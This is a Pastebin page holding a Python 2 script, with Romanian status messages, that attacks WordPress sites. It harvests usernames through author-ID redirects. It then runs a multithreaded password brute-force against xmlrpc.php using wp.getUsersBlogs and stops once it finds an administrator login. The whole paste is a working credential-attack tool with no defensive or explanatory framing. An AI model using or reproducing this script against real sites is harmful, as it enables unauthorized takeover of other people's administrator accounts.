API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Oct 17th, 2014
412
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.58 KB | None | 0 0
raw download clone embed print report
  1. import urllib2
  2. import Queue
  3. import threading,sys
  4.  
  5. useri=[]
  6. passwd=[]
  7. url=""
  8. work=0
  9. stiva=Queue.Queue()
  10. stiva_us=Queue.Queue()
  11. def login(domain,user,passs):
  12.  
  13. xml_post="<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>"+str(user)+"</string></value></param><param><value><string>"+str(passs)+"</string></value></param></params></methodCall>"
  14. re=urllib2.Request(domain,xml_post)
  15. try:
  16. ur=urllib2.urlopen(re)
  17. html=ur.read()
  18. if "Incorrect username" in html:
  19. return 0
  20. elif "isAdmin" in html:
  21. return 1
  22. elif "requested method " in html:
  23. print "[+] Modulul wp.getUsersBlogs e blocat!"
  24. exit()
  25. else:
  26. print "[!] unknow response"
  27. exit()
  28. except urllib2.URLError,e:
  29. print "[!] Erroare HTTP "+e.code()
  30. exit()
  31. def enum(j):
  32. global work,stiva,url,useri
  33. while work==1:
  34. try:
  35. i=stiva.get(False)
  36. try:
  37. r=urllib2.Request(url+"?author="+str(i))
  38. u=urllib2.urlopen(r)
  39. redirect=u.geturl()
  40. if "/author/" in redirect:
  41. splited=redirect.split("/author/")
  42. us=splited[1].replace("/","")
  43. if us not in useri:
  44. useri.append(us)
  45. print us
  46. except urllib2.URLError,e:
  47. a=1
  48. if stiva.empty():
  49. return 0
  50. except Queue.Empty:
  51. pass
  52. else:
  53. stiva.task_done()
  54.  
  55. def brute(j):
  56. global bad,stiva_us,url,work
  57. while work==1:
  58. try:
  59. creds=stiva_us.get(False)
  60. rez=login(url,creds[0],creds[1])
  61. print str(creds[0])+" "+str(creds[1])
  62. if rez==1:
  63. #print "[+] Got him ^~^ :"+str(creds[0])+" "+str(creds[1])
  64. work=0
  65. except Queue.Empty:
  66. pass
  67. else:
  68. stiva_us.task_done()
  69.  
  70. url=sys.argv[1]
  71. passwd=open(sys.argv[3]).read().splitlines()
  72. th=[]
  73. th_br=[]
  74. work=1
  75. for i in range(4):
  76. t=threading.Thread(target=enum,args=(1,))
  77. th.append(t)
  78. t.start()
  79. for i in range(12):
  80. stiva.put(i)
  81. for i in th:
  82. i.join()
  83. if len(useri)>0:
  84. print "[+] Am terminat de enumerat useri:"+str(len(useri))
  85. print "[+] Incep bruteforce"
  86. else:
  87. print "[-] Nu s-au gasit useri voi incerca cu lista de useri"
  88. users=open(sys.argv[2]).read().splitlines()
  89. for user in users:
  90. useri.append(user)
  91. print "[+] Incep bruteforce"
  92. print "[+] Testez daca exista xmlrpc.php"
  93. r=urllib2.Request(url+"/xmlrpc.php")
  94. try:
  95. ur=urllib2.urlopen(r)
  96. except urllib2.URLError,e:
  97. print "[!] "+e.code()+" xmlrpc nu exista!"
  98. exit()
  99. work=1
  100. url+="/xmlrpc.php"
  101. for us in useri:
  102. for p in passwd:
  103. stiva_us.put((us,p))
  104. for t in range(int(sys.argv[4])):
  105. thr=threading.Thread(target=brute,args=(1,))
  106. th_br.append(thr)
  107. thr.start()
  108. for t_j in th_br:
  109. t_j.join()
  110. print "[+] EXIT!"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!